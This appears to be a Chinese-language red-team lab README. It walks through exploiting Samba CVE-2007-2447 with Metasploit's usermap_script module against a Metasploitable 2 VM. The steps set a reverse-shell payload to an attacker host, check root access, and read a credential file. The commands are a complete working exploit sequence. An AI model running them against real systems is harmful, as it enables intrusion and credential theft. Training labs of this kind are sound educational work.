逐步渗透测试实验,利用 Metasploit 在 Metasploitable 2 上利用 Samba CVE-2007-2447 漏洞,演示 root 权限获取、凭据窃取和数据外泄,用于教育性红队训练。
RedTeam-SMB-PenTest |
|
msfconsole
确保攻击者主机和受害者虚拟机均已启动并运行。

search samba
use exploit/multi/samba/usermap_script
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse
exploit
whoami
hostname
cd /redteam7/student3
cat mypass.txt
# Leave current shell
Ctrl C
exit
# Kill all background jobs
sessions -K
jobs -K
# Restart Metasploit
msfconsole
usermap_script的旧版服务极易受攻击。| 组件 | 详细信息 |
|---|
| 攻击者虚拟机 | Kali Linux |
| 受害者虚拟机 | Metasploitable 2 |
| 目标端口 | 445 (Samba/SMB) |
| 使用的漏洞利用模块 | exploit/multi/samba/usermap_script |
| 凭据目标 | /redteam7/student3/mypass.txt |